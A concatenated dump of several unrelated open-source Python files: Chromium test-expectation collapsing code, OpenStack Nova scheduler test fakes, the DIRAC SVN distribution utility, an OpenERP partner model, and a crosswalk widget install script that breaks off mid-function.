def try_collapsing(size, collapsing_sets):
if len(specifiers_list) < size:
return False
for combination in self.combinations(specifiers_list, size):
if self.symmetric_difference(combination) in collapsing_sets:
for item in combination:
specifiers_list.remove(item)
specifiers_list.append(frozenset(self.intersect_combination(combination)))
return True
return False
# 2) Collapse specifier sets with common specifiers:
# (xp, release), (xp, debug) --> (xp, x86)
for size, collapsing_sets in self._collapsing_sets_by_size.items():
while try_collapsing(size, collapsing_sets):
pass
def try_abbreviating(collapsing_sets):
if len(specifiers_list) < 2:
return False
for combination in self.combinations(specifiers_list, 2):
for collapsing_set in collapsing_sets:
diff = self.symmetric_difference(combination)
if diff <= collapsing_set:
common = self.intersect_combination(combination)
for item in combination:
specifiers_list.remove(item)
specifiers_list.append(frozenset(common | diff))
return True
return False
# 3) Abbreviate specifier sets by combining specifiers across categories.
# (xp, release), (win7, release) --> (xp, win7, release)
while try_abbreviating(self._collapsing_sets_by_size.values()):
pass
        # 4) Substitute specifier subsets that match macros within each set:
# (xp, vista, win7, release) -> (win, release)
self.collapse_macros(self._configuration_macros, specifiers_list)
macro_keys = set(self._configuration_macros.keys())
        # 5) Collapsing macros may have created combinations that can now be abbreviated.
# (xp, release), (linux, x86, release), (linux, x86_64, release) --> (xp, release), (linux, release) --> (xp, linux, release)
while try_abbreviating([self._collapsing_sets_by_category['version'] | macro_keys]):
pass
# 6) Remove cases where we have collapsed but have all macros.
# (android, win, mac, linux, release) --> (release)
specifiers_to_remove = []
for specifier_set in specifiers_list:
if macro_keys <= specifier_set:
specifiers_to_remove.append(specifier_set)
for specifier_set in specifiers_to_remove:
specifiers_list.remove(specifier_set)
specifiers_list.append(frozenset(specifier_set - macro_keys))
return specifiers_list
| bsd-3-clause | -7,883,026,823,321,178,000 | 43.679739 | 155 | 0.629608 | false |
saleemjaveds/https-github.com-openstack-nova | nova/tests/scheduler/fakes.py | 19 | 11486 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fakes For Scheduler tests.
"""
import mox
from nova.compute import vm_states
from nova import db
from nova.openstack.common import jsonutils
from nova.scheduler import filter_scheduler
from nova.scheduler import host_manager
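# Fake compute node records used by the scheduler tests below; the final entry
# is deliberately broken (no service).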
COMPUTE_NODES = [
dict(id=1, local_gb=1024, memory_mb=1024, vcpus=1,
disk_available_least=None, free_ram_mb=512, vcpus_used=1,
free_disk_gb=512, local_gb_used=0, updated_at=None,
service=dict(host='host1', disabled=False),
hypervisor_hostname='node1', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=2, local_gb=2048, memory_mb=2048, vcpus=2,
disk_available_least=1024, free_ram_mb=1024, vcpus_used=2,
free_disk_gb=1024, local_gb_used=0, updated_at=None,
service=dict(host='host2', disabled=True),
hypervisor_hostname='node2', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=3, local_gb=4096, memory_mb=4096, vcpus=4,
disk_available_least=3333, free_ram_mb=3072, vcpus_used=1,
free_disk_gb=3072, local_gb_used=0, updated_at=None,
service=dict(host='host3', disabled=False),
hypervisor_hostname='node3', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=4, local_gb=8192, memory_mb=8192, vcpus=8,
disk_available_least=8192, free_ram_mb=8192, vcpus_used=0,
free_disk_gb=8888, local_gb_used=0, updated_at=None,
service=dict(host='host4', disabled=False),
hypervisor_hostname='node4', host_ip='127.0.0.1',
hypervisor_version=0),
# Broken entry
dict(id=5, local_gb=1024, memory_mb=1024, vcpus=1, service=None),
]
COMPUTE_NODES_METRICS = [
dict(id=1, local_gb=1024, memory_mb=1024, vcpus=1,
disk_available_least=512, free_ram_mb=512, vcpus_used=1,
free_disk_gb=512, local_gb_used=0, updated_at=None,
service=dict(host='host1', disabled=False),
hypervisor_hostname='node1', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 512,
'timestamp': None,
'source': 'host1'
},
{'name': 'bar',
'value': 1.0,
'timestamp': None,
'source': 'host1'
},
])),
dict(id=2, local_gb=2048, memory_mb=2048, vcpus=2,
disk_available_least=1024, free_ram_mb=1024, vcpus_used=2,
free_disk_gb=1024, local_gb_used=0, updated_at=None,
service=dict(host='host2', disabled=True),
hypervisor_hostname='node2', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 1024,
'timestamp': None,
'source': 'host2'
},
{'name': 'bar',
'value': 2.0,
'timestamp': None,
'source': 'host2'
},
])),
dict(id=3, local_gb=4096, memory_mb=4096, vcpus=4,
disk_available_least=3072, free_ram_mb=3072, vcpus_used=1,
free_disk_gb=3072, local_gb_used=0, updated_at=None,
service=dict(host='host3', disabled=False),
hypervisor_hostname='node3', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 3072,
'timestamp': None,
'source': 'host3'
},
{'name': 'bar',
'value': 1.0,
'timestamp': None,
'source': 'host3'
},
])),
dict(id=4, local_gb=8192, memory_mb=8192, vcpus=8,
disk_available_least=8192, free_ram_mb=8192, vcpus_used=0,
free_disk_gb=8192, local_gb_used=0, updated_at=None,
service=dict(host='host4', disabled=False),
hypervisor_hostname='node4', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 8192,
'timestamp': None,
'source': 'host4'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host4'
},
])),
dict(id=5, local_gb=768, memory_mb=768, vcpus=8,
disk_available_least=768, free_ram_mb=768, vcpus_used=0,
free_disk_gb=768, local_gb_used=0, updated_at=None,
service=dict(host='host5', disabled=False),
hypervisor_hostname='node5', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 768,
'timestamp': None,
'source': 'host5'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host5'
},
{'name': 'zot',
'value': 1,
'timestamp': None,
'source': 'host5'
},
])),
dict(id=6, local_gb=2048, memory_mb=2048, vcpus=8,
disk_available_least=2048, free_ram_mb=2048, vcpus_used=0,
free_disk_gb=2048, local_gb_used=0, updated_at=None,
service=dict(host='host6', disabled=False),
hypervisor_hostname='node6', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 2048,
'timestamp': None,
'source': 'host6'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host6'
},
{'name': 'zot',
'value': 2,
'timestamp': None,
'source': 'host6'
},
])),
]
INSTANCES = [
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host1', node='node1'),
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host2', node='node2'),
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host2', node='node2'),
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host='host3', node='node3'),
# Broken host
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host=None),
# No matching host
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host='host5', node='node5'),
]
class FakeFilterScheduler(filter_scheduler.FilterScheduler):
def __init__(self, *args, **kwargs):
super(FakeFilterScheduler, self).__init__(*args, **kwargs)
self.host_manager = host_manager.HostManager()
class FakeHostManager(host_manager.HostManager):
"""host1: free_ram_mb=1024-512-512=0, free_disk_gb=1024-512-512=0
host2: free_ram_mb=2048-512=1536 free_disk_gb=2048-512=1536
host3: free_ram_mb=4096-1024=3072 free_disk_gb=4096-1024=3072
host4: free_ram_mb=8192 free_disk_gb=8192
"""
def __init__(self):
super(FakeHostManager, self).__init__()
self.service_states = {
'host1': {
'compute': {'host_memory_free': 1073741824},
},
'host2': {
'compute': {'host_memory_free': 2147483648},
},
'host3': {
'compute': {'host_memory_free': 3221225472},
},
'host4': {
'compute': {'host_memory_free': 999999999},
},
}
class FakeHostState(host_manager.HostState):
def __init__(self, host, node, attribute_dict):
super(FakeHostState, self).__init__(host, node)
for (key, val) in attribute_dict.iteritems():
setattr(self, key, val)
class FakeInstance(object):
def __init__(self, context=None, params=None):
"""Create a test instance. Returns uuid."""
self.context = context
i = self._create_fake_instance(params=params)
self.uuid = i['uuid']
def _create_fake_instance(self, params=None):
"""Create a test instance."""
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = 1
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = 'fake'
inst['project_id'] = 'fake'
inst['instance_type_id'] = 2
inst['ami_launch_index'] = 0
inst.update(params)
return db.instance_create(self.context, inst)
class FakeComputeAPI(object):
def create_db_entry_for_new_instance(self, *args, **kwargs):
pass
def mox_host_manager_db_calls(mock, context):
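    # Stub out db.compute_node_get_all() so the host manager sees the fake
    # COMPUTE_NODES defined above.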
mock.StubOutWithMock(db, 'compute_node_get_all')
db.compute_node_get_all(mox.IgnoreArg()).AndReturn(COMPUTE_NODES)
| apache-2.0 | 3,606,294,047,448,555,500 | 42.839695 | 78 | 0.450113 | false |
rajanandakumar/DIRAC | Core/Utilities/Distribution.py | 3 | 16784 | # $HeadURL$
__RCSID__ = "$Id$"
import urllib2, re, tarfile, os, types, sys, subprocess, urlparse, tempfile
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities import CFG, File, List
class Distribution:
cernAnonRoot = 'http://svn.cern.ch/guest/dirac'
googleAnonRoot = 'http://dirac-grid.googlecode.com/svn'
cernDevRoot = 'svn+ssh://svn.cern.ch/reps/dirac'
googleDevRoot = 'https://dirac-grid.googlecode.com/svn'
anonymousSVNRoot = { 'global' : cernAnonRoot,
'DIRAC' : cernAnonRoot,
'LHCbDIRAC' : cernAnonRoot,
'LHCbVMDIRAC' : cernAnonRoot,
'LHCbWebDIRAC' : cernAnonRoot,
'BelleDIRAC' : googleAnonRoot,
'MagicDIRAC' : googleAnonRoot,
'CTADIRAC' : googleAnonRoot,
'EELADIRAC' : googleAnonRoot,
'ILCDIRAC' : cernAnonRoot,
'Docs' : googleAnonRoot,
}
devSVNRoot = { 'global' : cernDevRoot,
'DIRAC' : cernDevRoot,
'LHCbDIRAC' : cernDevRoot,
'LHCbVMDIRAC' : cernDevRoot,
'LHCbWebDIRAC' : cernDevRoot,
'ILCDIRAC' : cernDevRoot,
'BelleDIRAC' : googleDevRoot,
'MagicDIRAC' : googleDevRoot,
'CTADIRAC' : googleDevRoot,
'EELADIRAC' : googleDevRoot,
'Docs' : googleDevRoot,
}
def __init__( self, package = False ):
if not package:
package = 'global'
if package not in Distribution.anonymousSVNRoot:
raise Exception( "Package %s does not have a registered svn root" % package )
self.package = package
self.svnRoot = Distribution.anonymousSVNRoot[ package ]
self.svnPass = False
self.svnUser = False
self.cmdQueue = []
def getSVNPathForPackage( self, package, path ):
if package not in self.anonymousSVNRoot:
return "%s/%s" % ( Distribution.cernAnonRoot, path )
return "%s/%s" % ( self.anonymousSVNRoot[ package ], path )
def getPackageName( self ):
return self.package
def getDevPath( self, path = False ):
devPath = Distribution.devSVNRoot[ self.package ]
if path:
devPath += "/%s" % path
return devPath
def setSVNPassword( self, password ):
self.svnPass = password
def setSVNUser( self, user ):
self.svnUser = user
def addCommandToQueue( self, cmd ):
self.cmdQueue.append( cmd )
def executeCommandQueue( self ):
while self.cmdQueue:
if not self.executeCommand( self.cmdQueue.pop( 0 ), getOutput = False ):
return False
return True
def emptyQueue( self ):
return len( self.cmdQueue ) == 0
def getRepositoryVersions( self ):
if self.package == 'global' :
webLocation = "%s/tags" % self.svnRoot
else:
webLocation = '%s/%s/tags/%s' % ( self.svnRoot, self.package, self.package )
try:
remoteFile = urllib2.urlopen( webLocation )
except urllib2.URLError:
gLogger.exception()
sys.exit( 2 )
remoteData = remoteFile.read()
remoteFile.close()
if not remoteData:
gLogger.error( "Could not retrieve versions for package %s" % self.package )
sys.exit( 1 )
versions = []
rePackage = ".*"
versionRE = re.compile( "<li> *<a *href=.*> *(%s)/ *</a> *</li>" % rePackage )
for line in remoteData.split( "\n" ):
res = versionRE.search( line )
if res:
versions.append( res.groups()[0] )
return versions
def getSVNFileContents( self, svnPath ):
gLogger.info( "Reading %s from %s" % ( svnPath, self.svnRoot) )
remoteLocation = "%s/%s" % ( self.svnRoot, svnPath )
try:
remoteFile = urllib2.urlopen( remoteLocation )
remoteData = remoteFile.read()
remoteFile.close()
if remoteData:
return remoteData
except Exception:
pass
#Web cat failed. Try directly with svn
    exitStatus, remoteData = self.executeCommand( "svn cat '%s'" % remoteLocation )
if exitStatus:
print "Error: Could not retrieve %s from the web nor via SVN. Aborting..." % svnPath
sys.exit( 1 )
return remoteData
def loadCFGFromRepository( self, svnPath ):
remoteData = self.getSVNFileContents( svnPath )
return CFG.CFG().loadFromBuffer( remoteData )
def getVersionsCFG( self ):
return self.loadCFGFromRepository( '%s/trunk/%s/versions.cfg' % ( self.package, self.package ) )
def executeCommand( self, cmd, getOutput = True ):
env = dict( os.environ )
if self.svnPass:
env[ 'SVN_PASSWORD' ] = self.svnPass
if not getOutput:
return subprocess.Popen( cmd, shell = True, env = env ).wait() == 0
#Get output
proc = subprocess.Popen( cmd,
shell = True, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, close_fds = True, env = env )
stdData = proc.stdout.read()
proc.wait()
return ( proc.returncode, stdData )
def __getDevCmdBase( self, path ):
devRoot = self.getDevPath( path )
isHTTPS = False
urlRes = urlparse.urlparse( devRoot )
# Parse a URL into 6 components:
# <scheme>://<netloc>/<path>;<params>?<query>#<fragment>
# (scheme, netloc, path, params, query, fragment)
args = []
if urlRes[0] == "https":
isHTTPS = True
if self.svnUser:
if isHTTPS:
args.append( "--username '%s'" % self.svnUser )
else:
urlRes = list( urlparse.urlparse( devRoot ) )
urlRes[1] = "%s@%s" % ( self.svnUser, urlRes[1] )
devRoot = urlparse.urlunparse( urlRes )
if self.svnPass and isHTTPS:
args.append( "--password '%s'" % self.svnPass )
return ( " ".join( args ), devRoot )
def doLS( self, path ):
destT = self.__getDevCmdBase( path )
cmd = "svn ls %s %s" % destT
return self.executeCommand( cmd, True )
def __cmdImport( self, origin, dest, comment ):
destT = self.__getDevCmdBase( dest )
cmd = "svn import -m '%s' %s '%s' '%s'" % ( comment, destT[0], origin, destT[1] )
return cmd
def queueImport( self, origin, dest, comment ):
self.addCommandToQueue( self.__cmdImport( origin, dest, comment ) )
def doImport( self, origin, dest, comment ):
return self.executeCommand( self.__cmdImport( origin, dest, comment ), False )
def __cmdCopy( self, origin, dest, comment ):
destT = self.__getDevCmdBase( dest )
orT = self.__getDevCmdBase( origin )
cmd = "svn copy -m '%s' %s '%s' '%s'" % ( comment, destT[0], orT[1], destT[1] )
return cmd
def queueCopy( self, origin, dest, comment ):
self.addCommandToQueue( self.__cmdCopy( origin, dest, comment ) )
def __cmdMultiCopy( self, originList, dest, comment ):
orList = [ "'%s'" % self.__getDevCmdBase( orPath )[1] for orPath in originList ]
destT = self.__getDevCmdBase( dest )
cmd = "svn copy -m '%s' %s %s '%s'" % ( comment, destT[0], " ".join( orList ), destT[1] )
return cmd
def queueMultiCopy( self, originList, dest, comment ):
self.addCommandToQueue( self.__cmdMultiCopy( originList, dest, comment ) )
# def doCopy( self, path, comment ):
# return self.executeCommand( self.__cmdCopy( origin, dest, comment ), False )
def __cmdMakeDir( self, path, comment ):
destT = self.__getDevCmdBase( path )
return "svn mkdir --parents -m '%s' %s %s" % ( comment, destT[0], destT[1] )
def queueMakeDir( self, path, comment ):
self.addCommandToQueue( self.__cmdMakeDir( path, comment ) )
def doMakeDir( self, path, comment ):
return self.executeCommand( self.__cmdMakeDir( path, comment ), False )
def doCheckout( self, path, location ):
destT = self.__getDevCmdBase( path )
cmd = "svn co %s '%s' '%s'" % ( destT[0], destT[1], location )
return self.executeCommand( cmd, False )
def doCommit( self, location, comment ):
destT = self.__getDevCmdBase( "" )
cmd = "svn ci -m '%s' %s '%s'" % ( comment, destT[0], location )
return self.executeCommand( cmd, False )
#Get copy revision
def getCopyRevision( self, location ):
destT = self.__getDevCmdBase( location )
cmd = "svn log --stop-on-copy %s '%s'" % ( destT[0], destT[1] )
exitCode, outData = self.executeCommand( cmd )
if exitCode:
return 0
copyRev = 0
revRE = re.compile( "r([0-9]+)\s*\|\s*(\w+).*" )
for line in List.fromChar( outData, "\n" ):
reM = revRE.match( line )
if reM:
copyRev = reM.groups()[0]
return copyRev
#
def writeVersionToTmpInit( self, version ):
verTup = parseVersionString( version )
if not verTup:
return False
destT = self.__getDevCmdBase( "%s/trunk/%s/__init__.py" % ( self.package, self.package ) )
cmd = "svn cat %s '%s'" % ( destT[0], destT[1] )
exitCode, outData = self.executeCommand( cmd )
if exitCode:
return False
tmpfd, tmpname = tempfile.mkstemp()
versionStrings = ( "majorVersion", "minorVersion", "patchLevel", "preVersion" )
reList = []
for iP in range( len( versionStrings ) ):
if verTup[iP]:
replStr = "%s = %s" % ( versionStrings[iP], verTup[iP] )
else:
replStr = "%s = 0" % versionStrings[iP]
reList.append( ( re.compile( "^(%s\s*=)\s*[0-9]+\s*" % versionStrings[iP] ), replStr ) )
for line in outData.split( "\n" ):
for reCm, replStr in reList:
line = reCm.sub( replStr, line )
os.write( tmpfd, "%s\n" % line )
os.close( tmpfd )
return tmpname
#End of Distribution class
gVersionRE = re.compile( "v([0-9]+)(?:r([0-9]+))?(?:p([0-9]+))?(?:-pre([0-9]+))?" )
def parseVersionString( version ):
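  '''Parse a DIRAC version string such as "v6r12p3-pre1" into a
  (major, minor, patch, pre) tuple; fields missing from the string are None.'''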
result = gVersionRE.match( version.strip() )
if not result:
return False
vN = []
for e in result.groups():
if e:
vN.append( int( e ) )
else:
vN.append( None )
return tuple( vN )
def writeVersionToInit( rootPath, version ):
verTup = parseVersionString( version )
if not verTup:
return S_OK()
initFile = os.path.join( rootPath, "__init__.py" )
if not os.path.isfile( initFile ):
return S_OK()
try:
fd = open( initFile, "r" )
fileData = fd.read()
fd.close()
except Exception, e:
return S_ERROR( "Could not open %s: %s" % ( initFile, str( e ) ) )
versionStrings = ( "majorVersion", "minorVersion", "patchLevel", "preVersion" )
reList = []
for iP in range( len( versionStrings ) ):
if verTup[iP]:
replStr = "%s = %s" % ( versionStrings[iP], verTup[iP] )
else:
replStr = "%s = 0" % versionStrings[iP]
reList.append( ( re.compile( "^(%s\s*=)\s*[0-9]+\s*" % versionStrings[iP] ), replStr ) )
newData = []
for line in fileData.split( "\n" ):
for reCm, replStr in reList:
line = reCm.sub( replStr, line )
newData.append( line )
try:
fd = open( initFile, "w" )
fd.write( "\n".join( newData ) )
fd.close()
except Exception, e:
return S_ERROR( "Could write to %s: %s" % ( initFile, str( e ) ) )
return S_OK()
#
def createTarball( tarballPath, directoryToTar, additionalDirectoriesToTar = None ):
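  '''Create a gzipped tarball of directoryToTar (plus any additional
  directories) and write a matching .md5 checksum file next to it.'''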
tf = tarfile.open( tarballPath, "w:gz" )
tf.add( directoryToTar, os.path.basename( os.path.abspath( directoryToTar ) ), recursive = True )
if type( additionalDirectoriesToTar ) in ( types.StringType, types.UnicodeType ):
additionalDirectoriesToTar = [ additionalDirectoriesToTar ]
if additionalDirectoriesToTar:
for dirToTar in additionalDirectoriesToTar:
if os.path.isdir( dirToTar ):
tf.add( dirToTar, os.path.basename( os.path.abspath( dirToTar ) ), recursive = True )
tf.close()
md5FilePath = False
for suffix in ( ".tar.gz", ".gz" ):
sLen = len( suffix )
if tarballPath[ len( tarballPath ) - sLen: ] == suffix:
md5FilePath = "%s.md5" % tarballPath[:-sLen]
break
if not md5FilePath:
return S_ERROR( "Could not generate md5 filename" )
md5str = File.getMD5ForFiles( [ tarballPath ] )
fd = open( md5FilePath, "w" )
fd.write( md5str )
fd.close()
return S_OK()
#Start of release notes
gAllowedNoteTypes = ( "NEW", "CHANGE", "BUGFIX", 'FIX' )
gNoteTypeAlias = { 'FIX' : 'BUGFIX' }
def retrieveReleaseNotes( packages ):
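  '''Collect the release notes of each package from the comments of its
  versions.cfg and return them as a dictionary keyed by package name.'''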
if type( packages ) in ( types.StringType, types.UnicodeType ):
packages = [ str( packages ) ]
packageCFGDict = {}
#Get the versions.cfg
for package in packages:
packageCFGDict[ package ] = Distribution( package ).getVersionsCFG()
#Parse the release notes
pkgNotesDict = {}
for package in packageCFGDict:
versionsCFG = packageCFGDict[ package ][ 'Versions' ]
pkgNotesDict[ package ] = []
for mainVersion in versionsCFG.listSections( ordered = True ):
vCFG = versionsCFG[ mainVersion ]
versionNotes = {}
for subsys in vCFG.listOptions():
comment = vCFG.getComment( subsys )
if not comment:
continue
versionNotes[ subsys ] = {}
lines = List.fromChar( comment, "\n" )
lastCommentType = False
for line in lines:
processedLine = False
for typeComment in gAllowedNoteTypes:
if line.find( "%s:" % typeComment ) == 0:
if typeComment in gNoteTypeAlias:
effectiveType = gNoteTypeAlias[ typeComment ]
else:
effectiveType = typeComment
if effectiveType not in versionNotes[ subsys ]:
versionNotes[ subsys ][ effectiveType ] = []
versionNotes[ subsys ][ effectiveType ].append( line[ len( typeComment ) + 1: ].strip() )
lastCommentType = effectiveType
processedLine = True
if not processedLine and lastCommentType:
            versionNotes[ subsys ][ lastCommentType ][-1] += " %s" % line.strip()
if versionNotes:
pkgNotesDict[ package ].append( { 'version' : mainVersion, 'notes' : versionNotes } )
versionComment = versionsCFG.getComment( mainVersion )
if versionComment:
pkgNotesDict[ package ][-1][ 'comment' ] = "\n".join( [ l.strip() for l in versionComment.split( "\n" ) ] )
return pkgNotesDict
def generateReleaseNotes( packages, destinationPath, versionReleased = "", singleVersion = False ):
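  '''Write a plain-text release notes file to destinationPath, optionally
  restricted to (or starting from) versionReleased.'''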
if type( packages ) in ( types.StringType, types.UnicodeType ):
packages = [ str( packages ) ]
pkgNotesDict = retrieveReleaseNotes( packages )
fileContents = []
foundStartVersion = versionReleased == ""
for package in packages:
if package not in pkgNotesDict:
continue
#Add a section with the package name
dummy = "Package %s" % package
fileContents.append( "-" * len( dummy ) )
fileContents.append( dummy )
fileContents.append( "-" * len( dummy ) )
vNotesDict = pkgNotesDict[ package ]
for versionNotes in vNotesDict:
if singleVersion and versionReleased and versionNotes[ 'version' ] != versionReleased:
continue
if versionReleased and versionReleased == versionNotes[ 'version' ]:
foundStartVersion = True
#Skip until found initial version
if not foundStartVersion:
continue
dummy = "Version %s" % versionNotes[ 'version' ]
fileContents.append( "" )
fileContents.append( dummy )
fileContents.append( "-" * len( dummy ) )
if 'comment' in versionNotes:
fileContents.extend( [ '', versionNotes[ 'comment' ], '' ] )
for noteType in gAllowedNoteTypes:
notes4Type = []
for system in versionNotes[ 'notes' ]:
if noteType in versionNotes[ 'notes' ][ system ] and versionNotes[ 'notes' ][ system ][ noteType ]:
notes4Type.append( " %s" % system )
for line in versionNotes[ 'notes' ][ system ][ noteType ]:
notes4Type.append( " - %s" % line )
if notes4Type:
fileContents.append( "" )
fileContents.append( "%s" % noteType )
fileContents.append( ":" * len( noteType ) )
fileContents.append( "" )
fileContents.extend( notes4Type )
fd = open( destinationPath, "w" )
fd.write( "%s\n\n" % "\n".join( fileContents ) )
fd.close()
def generateHTMLReleaseNotesFromRST( rstFile, htmlFile ):
try:
import docutils.core
except ImportError:
gLogger.error( "Docutils is not installed, skipping generation of release notes in html format" )
return False
try:
fd = open( rstFile )
rstData = fd.read()
fd.close()
except Exception:
gLogger.error( "Oops! Could not read the rst file :P" )
return False
parts = docutils.core.publish_parts( rstData, writer_name = 'html' )
try:
fd = open( htmlFile, "w" )
fd.write( parts[ 'whole' ] )
fd.close()
except Exception:
gLogger.error( "Oops! Could not write the html file :P" )
return False
return True
| gpl-3.0 | 6,507,806,666,317,573,000 | 35.172414 | 115 | 0.611177 | false |
gurneyalex/vertical-travel | railway_station/res_partner.py | 2 | 1263 | # -*- encoding: utf-8 -*-
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2013 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from openerp.osv import orm, fields
class res_partner(orm.Model):
"""
    Inherits partner and adds the railway_station field to the partner
    form
"""
_inherit = 'res.partner'
_columns = {
'railway_station': fields.boolean('Railway Station'),
}
_defaults = {
'railway_station': 0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -326,881,288,099,529,500 | 34.083333 | 77 | 0.691211 | false |
JianfengXu/crosswalk-test-suite | webapi/tct-navigationtiming-w3c-tests/inst.wgt.py | 44 | 6786 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
    # No need to handle timeouts in this short script; let the tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user)
return doCMD(cmd)
def getPKGID(pkg_name=None):
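    # Look up the Tizen package id of an installed widget by scanning the
    # output of `pkgcmd -l` on the device.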
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
if line.find("[" + pkg_name + "]") != -1:
pkgidIndex = line.split().index("pkgid")
test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
    # Return True on success so that callers can treat a falsy result as a
    # failed copy.
    return return_code == 0
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(
os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith(".wgt"):
continue
elif item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
# if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
